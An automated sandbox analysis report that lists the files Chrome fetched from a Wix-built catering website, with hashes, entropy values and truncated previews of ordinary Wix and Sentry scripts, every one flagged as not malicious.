                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ....................................................o..o.z.................................................v.........{...u.v.m.................................O.................y...r...l..g.O.................x...n!..c...a/..............w...o...h...c..._...Zx..........z9..v-..q!..h...^...b:..~.......t...j...c...^...Z}..Wz..........zH..zE..y<..u...o!..f..W.a.|.a.n..c...\...Xy..Uv..Tq..........zS..{T..{T..{Q..yG..v...........d...Y{.Tu..Po..Kh..t\..........{`..|b..|e..|i..|n..................Mk..If..C]..lS...P..........{l..|p..|u..}}..}.z.................C^z.ST..O...O...O..........}x..}|..}...}...mw..I7...........N..L...M...M...N...N..........}...}...}...~...ag..\9..xC..G..I..K...K...L...M...N..........}...}...~...~...ak..^:..{C..F..H..I..K..K...L...M..........x...}...~.......bl.._;..|C..F...G..I..J..K..K...K..................~.O....gt..a;..}C..F..G..H..I..JO......................
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (21838)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):360258
                                                                                                                                                                                                                        Entropy (8bit):5.62822146923574
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:I1ntC8FRSDems+5oByftgFyxU00a97pQx8K58CllFB97Iex8CXK7DazaxayRZmCD:I1nTTms+5oByftgFyqyC58ikYXKt4QT
                                                                                                                                                                                                                        MD5:3F8FF2C18FCB83E97268D76FD30C8F08
                                                                                                                                                                                                                        SHA1:C39292A40575BE9433770308CABA6D255F002951
                                                                                                                                                                                                                        SHA-256:E25E239776BE8590E6FE7A6A4AE93D20E89E7D8472F3639CFDD5DA32DC4A0CC6
                                                                                                                                                                                                                        SHA-512:EFF65587E0B02E2FCFB0FB9F5BD13E4C763CD3B2B78FC456668EFCB1C6D78FD9376A708AEFA20E567E3B457C55F097A3065B5CF80160BB3B91B388AF0A6C9988
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://www.samantacatering.com/
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. . <meta charset='utf-8'>. <meta name="viewport" content="width=device-width, initial-scale=1" id="wixDesktopViewport" />. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="generator" content="Wix.com Website Builder"/>.. <link rel="icon" sizes="192x192" href="https://static.parastorage.com/client/pfavico.ico" type="image/x-icon"/>. <link rel="shortcut icon" href="https://static.parastorage.com/client/pfavico.ico" type="image/x-icon"/>. <link rel="apple-touch-icon" href="https://static.parastorage.com/client/pfavico.ico" type="image/x-icon"/>.. Safari Pinned Tab Icon -->. <link rel="mask-icon" href="https://static.parastorage.com/client/pfavico.ico"> -->.. Original trials -->. .. Legacy Polyfills -->. <script nomodule="" src="https://static.parastorage.com/unpkg/core-js-bundle@3.2.1/minified.js"></script>. <script nomodule="" src="https://static.parastorage.com/unpkg/focus-within-polyfill@5.0.9/
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2754)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2925
                                                                                                                                                                                                                        Entropy (8bit):5.16872928903241
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YozXUSTSEjuPgUXyXAGd2tgTVYay0kzut5KlMEU4DWuLXaj0wADqjs4PTCeX71:3XUiA4UCBmzpMEU1uLXI0NDqDPTCeL1
                                                                                                                                                                                                                        MD5:D98A47B19810FFA91D973921F80DE69B
                                                                                                                                                                                                                        SHA1:E85DBB96C0EBB9884D78D89A11D5453CD51B3D93
                                                                                                                                                                                                                        SHA-256:8D2335CD970B19510398ED110C5E56FF3BC33E7623833FA0C1084325BC197BC2
                                                                                                                                                                                                                        SHA-512:8F091526A61454A46D369DFE5C81CA331AA1A3B1A950CEEA24C6399ACE88ABA4D015FA3BF07171E7F18BB53BF8C570BE02DE3A767C6F462B0FA85CC58A018ADC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[SkipToContentButton].69abe737.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[SkipToContentButton]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[SkipToContentButton]"]=t(require("react")):e["rb_wixui.thunderbolt[SkipToContentButton]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)({}).hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},n={};function r(e){var o=n[e];if(void 0!==o)return o.exports;var u=n[e]={exports:{}};return t[e](u,u.exports,r),u.exports}r.n=function(e){var t=e&&e.__esModule?funct
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (34344)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):34525
                                                                                                                                                                                                                        Entropy (8bit):5.579546412668395
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:pN9nXdO+qTmjeMIfpNUQgF0U4OnV/iz0N3MXYCKLGJyH4ejcVQBlnI3KbqNIYMrk:pN9biAOcEJJyHzv5dpi2LmH
                                                                                                                                                                                                                        MD5:5ACDE22DED43B52C303764D4750B1770
                                                                                                                                                                                                                        SHA1:7757A7E3F4E0BEAE8EBB97991C7017FB1BAC1B74
                                                                                                                                                                                                                        SHA-256:A3838845E302E733A0C87F413C343FCE49465995952DAE20E4CDFFBAF78D442D
                                                                                                                                                                                                                        SHA-512:BCE2ABBE04076AE0D524BD7180E8D283582091A26DF30903221811561715EDF18E9B80490EFC3D63C57285DD91CEE10172CC716804698E5B40DF2228D3934636
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StripColumnsContainer_Default].51ef30fd.bundle.min.js
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[StripColumnsContainer_Default]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[StripColumnsContainer_Default]"]=t(require("react")):e["rb_wixui.thunderbolt[StripColumnsContainer_Default]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):95126
                                                                                                                                                                                                                        Entropy (8bit):5.331460772202459
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:nB6MxQXiOrqlaY7DRt5uQ3QzwDQ9USzA119zJwh:nkMxQy6ql1bvAzwDQ9zzAb9zJk
                                                                                                                                                                                                                        MD5:09C587F361BED7D0C70E8DCE1F76F0E7
                                                                                                                                                                                                                        SHA1:27C0F7FD9EB5653A7C961A95E096B79EDCE4DB24
                                                                                                                                                                                                                        SHA-256:8F0DA91B68BB81F656A55474D780E322217F769F300722A831F642767664A725
                                                                                                                                                                                                                        SHA-512:4F9B5922E3A326D755BB149A7CD2B529F8E3F07F7E9AAA2A6DC27ECE6E3CEFC0AE9411C6136308134927F79E60042F1DB4DAE3571D3FA862F6097CBD3B51AEC1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3909],{68747:(t,e,a)=>{a.r(e),a.d(e,{AnimationManager:()=>M,MotionSymbol:()=>T.h,animationApiFactory:()=>_r,page:()=>Dr});var n={};a.r(n),a.d(n,{initialFrame:()=>se,prepare:()=>ue,style:()=>me,web:()=>fe});var r={};a.r(r),a.d(r,{initialFrame:()=>se,style:()=>ge,web:()=>pe});var o={};a.r(o),a.d(o,{initialFrame:()=>se,style:()=>ye,web:()=>he});var i={};a.r(i),a.d(i,{initialFrame:()=>se,style:()=>Oe,web:()=>ke});var s={};a.r(s),a.d(s,{initialFrame:()=>se,prepare:()=>Pe,style:()=>Ye,web:()=>Ie});var c={};a.r(c),a.d(c,{initialFrame:()=>se,prepare:()=>Te,style:()=>Se,web:()=>Xe});var l={};a.r(l),a.d(l,{initialFrame:()=>se,style:()=>Me,web:()=>_e});var f={};a.r(f),a.d(f,{initialFrame:()=>se,prepare:()=>Ze,style:()=>Re,web:()=>Fe});var m={};a.r(m),a.d(m,{initialFrame:()=>se,style:()=>Ce,web:()=>He});var u={};a.r(u),a.d(u,{initialFrame:()=>se,prepare:()=>je,style:()=>Ue,web:()=>Le});var d={};
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2768)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2942
                                                                                                                                                                                                                        Entropy (8bit):5.207735632323389
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YozXUSGLSWdBjuPgUXyXAGxTu2TZYgkfu92blKYcjFVnGNFDFkf0WTI0FeX7hK5:3XUrL3ds4UCNctfjZ0RGXZ20WTIMeLhk
                                                                                                                                                                                                                        MD5:3D1D851128E88481BF4FE055902E792A
                                                                                                                                                                                                                        SHA1:4457A1BBC9765FCB1F9C7E8FE8AAE415359D314F
                                                                                                                                                                                                                        SHA-256:79251DF39F985CE0F2D252349098427F59CD586B5465B4C13C5D5F9396487FAB
                                                                                                                                                                                                                        SHA-512:5D1992A0995FA8402C55748F9B39B8F688DD87CCA840D88E7E9D8416E389C9C487BC840F74AEBB32398311F4665AB8C2705635B3B42EB744F69A86603F7CD3BC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[FiveGridLine_SolidLine]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(require("react")):e["rb_wixui.thunderbolt[FiveGridLine_SolidLine]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)({}).hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},r={};function n(e){var o=r[e];if(void 0!==o)return o.exports;var i=r[e]={exports:{}};return t[e](i,i.exports,n),i.exports}n.n=function(e){var t=e&&e.__esMod
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65125)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):65254
                                                                                                                                                                                                                        Entropy (8bit):5.186764349436421
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:H30nlF9rR4ypFCq1PXVQBJBzDoc7J/wz/FdJqu/uY7IDqisHK3OsMdww6o6dqUdW:HOn9rR4oOF3zjww4Ud4hz
                                                                                                                                                                                                                        MD5:3629A21319D5273A0E5422894398763A
                                                                                                                                                                                                                        SHA1:2EC80AAFAFA54CE2D289247961335DD4DDE988E4
                                                                                                                                                                                                                        SHA-256:FC282CEB777458C14CD5A30CA54A0BA2B409136658B467C25BF929C185AD68F4
                                                                                                                                                                                                                        SHA-512:DCC43DE82B45E0E0DD551505C15BB984992A5AC2A2E1E58603CE76ADF1D32C191FD13CE15F9346E6BACF368A24ED4884A78DBC46E7EB340F5FD2B3E3747917E3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://browser.sentry-cdn.com/6.18.2/bundle.min.js
                                                                                                                                                                                                                        Preview:/*! @sentry/browser 6.18.2 (22f518e) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){var n=function(t,r){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(t[r]=n[r])},n(t,r)};function r(t,r){if("function"!=typeof r&&null!==r)throw new TypeError("Class extends value "+String(r)+" is not a constructor or null");function i(){this.constructor=t}n(t,r),t.prototype=null===r?Object.create(r):(i.prototype=r.prototype,new i)}var i,e=function(){return e=Object.assign||function(t){for(var n,r=1,i=arguments.length;r<i;r++)for(var e in n=arguments[r])Object.prototype.hasOwnProperty.call(n,e)&&(t[e]=n[e]);return t},e.apply(this,arguments)};function o(t){var n="function"==typeof Symbol&&Symbol.iterator,r=n&&t[n],i=0;if(r)return r.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.length&&(t=void 0),{value:t&&t[i++],done:!t}}};throw
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (28627)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):49944
                                                                                                                                                                                                                        Entropy (8bit):5.438406261909306
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:tHHklIK8fNDDyiZIN7g2+FfM+rUCjAdsY8145SXBhonQSOZGPTRmAs2PqDuHM5z6:rq8dM+wsbi3jRF4+bH2fKmuEvMH
                                                                                                                                                                                                                        MD5:089A2F90EDF2B72A82054FF2DBC394FF
                                                                                                                                                                                                                        SHA1:E5C2DFCFE1136C8A3630FE57DC231DE42960A85D
                                                                                                                                                                                                                        SHA-256:B3FA46F6A8A3E06E28A9FAB80A240BA8C79C72A550E6030988AC197C477815C6
                                                                                                                                                                                                                        SHA-512:B77DA570A3932C5AFA6D8571849E3EE1574C09C34818DB5381300C8000DBCEBBD1586FF844863D3A5F945E390EC20D99859553A95E5E227165167A261601DA2B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[851],{31124:()=>{(()=>{var e={212:./*!*******************************************************************!*\. !*** ../../node_modules/@babel/runtime/helpers/defineProperty.js ***!. \*******************************************************************/(e,t,n)=>{var r=n(/*! ./toPropertyKey.js */347);e.exports=function(e,t,n){return(t=r(t))in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e},e.exports.__esModule=!0,e.exports.default=e.exports},878:./*!****************************************************************!*\. !*** ../../node_modules/@babel/runtime/helpers/toPrimitive.js ***!. \****************************************************************/(e,t,n)=>{var r=n(/*! ./typeof.js */319).default;e.exports=function(e,t){if("object"!=r(e)||!e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var o=n.call(e,t||"default");if("object"!=r(o))return o;throw
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4328)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4443
                                                                                                                                                                                                                        Entropy (8bit):5.210306456955577
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:wsarUrqKuYhj2rsF49vBZ3ZIbfWykGu5/X6GubXUquF+qf4O8JFVpzQPp6BMUC5y:HoojZMyudduiV4O8LVpzmoijY
                                                                                                                                                                                                                        MD5:250AC9233A06B0E05EFE967BD623D58C
                                                                                                                                                                                                                        SHA1:16BC3C329960575F26AB4C9525CCA0932A865D8E
                                                                                                                                                                                                                        SHA-256:52DFC30C9FEF3216903FEB62B04794EDB9F53ADF5DF549557D825C67DF831317
                                                                                                                                                                                                                        SHA-512:6BEE854EE1B3B65148C9C52B6E66693126B818309795A9C04C6D57F9B01F5E6D02B17B8EE78E613263D3B99A9EEB921B51477435502AA5C0C1FD1118ED1FE603
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5221],{89648:(e,t,n)=>{n.d(t,{E$:()=>A,_3:()=>g,P2:()=>b});class r{constructor(e){this.enqueueIndex=0,this.dequeueIndex=0,this.initialQueueSize=0,this.queue=new Array(e),this.initialQueueSize=e}enqueue(e){this.enqueueIndex<this.initialQueueSize?this.queue[this.enqueueIndex++]=e:++this.enqueueIndex&&this.queue.push(e)}dequeue(){const e=this.queue[this.dequeueIndex++];return this.dequeueIndex===this.enqueueIndex&&(this.enqueueIndex=0,this.dequeueIndex=0),e}isEmpty(){return 0===this.enqueueIndex}}const o="~~",s=16,i=Symbol.for("EMPTY_SCHEMA"),u=(e,t)=>{let n=e;for(const e of t)if(n=n[e],void 0===n)return;return n},d=(e,t,n)=>{let r=e,o=0;for(;o<t.length-1;o++)r[t[o]]=r[t[o]]||{},r=r[t[o]];r[t[o]]=n},a=(e,t,n,r)=>e[t]?.[n]?.[r],l=(e,t,n,r,o)=>{e[t]=e[t]||{},e[t][n]=e[t][n]||{},e[t][n][r]=o},c=([e,t,n])=>f(e,t,n),f=(e,t,n)=>`${e}${o}${t}${o}${n}`,h=e=>e.split(o),p=(e,t,n)=>{const o=new r(
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13456)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):13630
                                                                                                                                                                                                                        Entropy (8bit):5.339546552423437
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:3H7oQa3MZ57JJKYBv21PfP4Pzq8+k0zmPj1y96NKprTzLV:X7o3K57/KYBuZHEzq8+k0zmPj1y9QKpd
                                                                                                                                                                                                                        MD5:F6C5267469320416D27B21C1469BCE28
                                                                                                                                                                                                                        SHA1:42F845D124694D0A0D2F59D0D5BEBBF84C897BDF
                                                                                                                                                                                                                        SHA-256:7ED3CE515B4EBD41BA60C6A39762740EF82BB13AEB89357E961D29EC540CDC96
                                                                                                                                                                                                                        SHA-512:C3EF082D07FD650418B68C47598EBDA8215D78E02EF496C524A6C8F819A81EB0D3FE3DB08DC19946282E61103CD0E047DD9D5E264E89D3C0335A7EAC290834CD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[StylableButton_Default]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[StylableButton_Default]"]=t(require("react")):e["rb_wixui.thunderbolt[StylableButton_Default]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={27232:function(e,t,n){var a=n(82016);e.exports=a.create("StylableButton2545352419",{classes:{root:"StylableButton2545352419__root",label:"StylableButton2545352419__label",link:"StylableButton2545352419__link",container:"StylableButton2545352419__container",icon:"StylableButton2545352419__icon"},vars:{},stVars:{},keyframes:{},layers:{}},"",-1,e.id)},82016:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.createRenderable=t.create=void 0;t.create=function(e,t,n,a,r,o){const l={namespace:e,classes:t.classes,keyframes:t.keyframes
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):250949
                                                                                                                                                                                                                        Entropy (8bit):5.364615104718801
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:eTK6NapLyLitzqNLMDIpypa2SMcu9Iiv8GBi4k9+ZHkROK0mzA0p0OqmIP:eTK6NapLyLizqNLMDIpypa2SMcPiv8v4
                                                                                                                                                                                                                        MD5:50777A3F69F6F3C8DE78FA49E9DD9F43
                                                                                                                                                                                                                        SHA1:4CE01B79203D7CDD2F8439DDA437107020D1048C
                                                                                                                                                                                                                        SHA-256:A8BE64044A27BF55851FF8BCB053F6C84645B6E86BF5651A0E59BFC4C0928604
                                                                                                                                                                                                                        SHA-512:2554C11BDEE50F0A36E0EED65C99D78338C1250ADB379324F4F81C2CCEB52158BDC7563FA142008439A0FAAC6BB614A3818244BF73244AB8CF7554DD40893005
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3671],{80807:(e,t,a)=>{a.r(t),a.d(t,{Animations:()=>Pa.Qw,EditorAnimationsSym:()=>Pa._H,name:()=>Pa.UU,page:()=>Pw});var n={};a.r(n),a.d(n,{animate:()=>Ja,name:()=>Ga,properties:()=>Za});var i={};a.r(i),a.d(i,{animate:()=>nn,name:()=>en,properties:()=>tn});var r={};a.r(r),a.d(r,{animate:()=>sn,name:()=>rn,properties:()=>on});var o={};a.r(o),a.d(o,{animate:()=>In,name:()=>Sn,properties:()=>Mn});var s={};a.r(s),a.d(s,{animate:()=>Rn,name:()=>Fn,properties:()=>$n});var d={};a.r(d),a.d(d,{animate:()=>An,name:()=>Cn,properties:()=>En});var c={};a.r(c),a.d(c,{animate:()=>Xn,name:()=>Yn,properties:()=>Dn});var u={};a.r(u),a.d(u,{animate:()=>Vn,name:()=>qn,properties:()=>Hn});var l={};a.r(l),a.d(l,{animate:()=>Ln,name:()=>Nn,properties:()=>zn});var m={};a.r(m),a.d(m,{animate:()=>Wn,name:()=>Un,properties:()=>jn});var p={};a.r(p),a.d(p,{animate:()=>Zn,name:()=>Qn,properties:()=>Kn});var f={};
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (35820)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35986
                                                                                                                                                                                                                        Entropy (8bit):5.569903304634807
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:kbRKdzorTmxZYGp4LbGhldSOfTFGClWlTJO+cQa2eU+YVQVjtwu2/BBcvIFyuYwV:Tau3blGySeUlwmYLU
                                                                                                                                                                                                                        MD5:3C2141856AA19756FA64FF89EA57714C
                                                                                                                                                                                                                        SHA1:DCA81FDB0511199EBDF9F969B4867AA35EECD2FC
                                                                                                                                                                                                                        SHA-256:B41EB18C820E54A87B4DA4E511EB99DA3DA48A3CFCBC0F4CACD950490350FEBD
                                                                                                                                                                                                                        SHA-512:C374C27209000C4B313773C1FCFD293F998D0ACCDB4BCD5BFB8CB9540AE7D3189FC311FE0BE4AB22C29F3436B01335237B796F80F7D5DB158859C74FB08175F2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[ClassicSection]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[ClassicSection]"]=t(require("react")):e["rb_wixui.thunderbolt[ClassicSection]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},i={};function a(e){var n=i[e];if(void 0!==n)return n.exports;var r=i[e]={exports:{}};return t[e](r,r.exports,a),r.exports}a.n=function(e){var t=e&&e.__esModule?function(){return e.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2754)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2925
                                                                                                                                                                                                                        Entropy (8bit):5.16872928903241
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YozXUSTSEjuPgUXyXAGd2tgTVYay0kzut5KlMEU4DWuLXaj0wADqjs4PTCeX71:3XUiA4UCBmzpMEU1uLXI0NDqDPTCeL1
                                                                                                                                                                                                                        MD5:D98A47B19810FFA91D973921F80DE69B
                                                                                                                                                                                                                        SHA1:E85DBB96C0EBB9884D78D89A11D5453CD51B3D93
                                                                                                                                                                                                                        SHA-256:8D2335CD970B19510398ED110C5E56FF3BC33E7623833FA0C1084325BC197BC2
                                                                                                                                                                                                                        SHA-512:8F091526A61454A46D369DFE5C81CA331AA1A3B1A950CEEA24C6399ACE88ABA4D015FA3BF07171E7F18BB53BF8C570BE02DE3A767C6F462B0FA85CC58A018ADC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[SkipToContentButton]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt[SkipToContentButton]"]=t(require("react")):e["rb_wixui.thunderbolt[SkipToContentButton]"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={5329:function(t){"use strict";t.exports=e},448:function(e){function t(){return e.exports=t=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)({}).hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e},e.exports.__esModule=!0,e.exports.default=e.exports,t.apply(null,arguments)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports}},n={};function r(e){var o=n[e];if(void 0!==o)return o.exports;var u=n[e]={exports:{}};return t[e](u,u.exports,r),u.exports}r.n=function(e){var t=e&&e.__esModule?funct
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (2987)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3110
                                                                                                                                                                                                                        Entropy (8bit):5.382838485137194
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:dKsTwGb/b0/osS/UkhouCFOqkZ/tEM/sJQk42VmMZK9LXlCqks8AEKWWk:8z6o/osMo9OqkjxH2VmMeXlC0ZWWk
                                                                                                                                                                                                                        MD5:753F644A5D82B7A814FC7A0744BDAF3A
                                                                                                                                                                                                                        SHA1:5D6FC114CD6DD267ED8DB745336F9A971AEC59FE
                                                                                                                                                                                                                        SHA-256:BBF1A0F65E5617B8FBB0AF3D510CD0E0819EEB0795A5D2C2AD35A020B2AD3584
                                                                                                                                                                                                                        SHA-512:547AF561CA4ACC5F5CB0A4178CD651CCE730E5CB867130BD3F233A66A9A0A930BCBD6C8767D89375D8600CA17F9CF1FB883369B8ECC1E88E0CF82B23FC4FCD0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
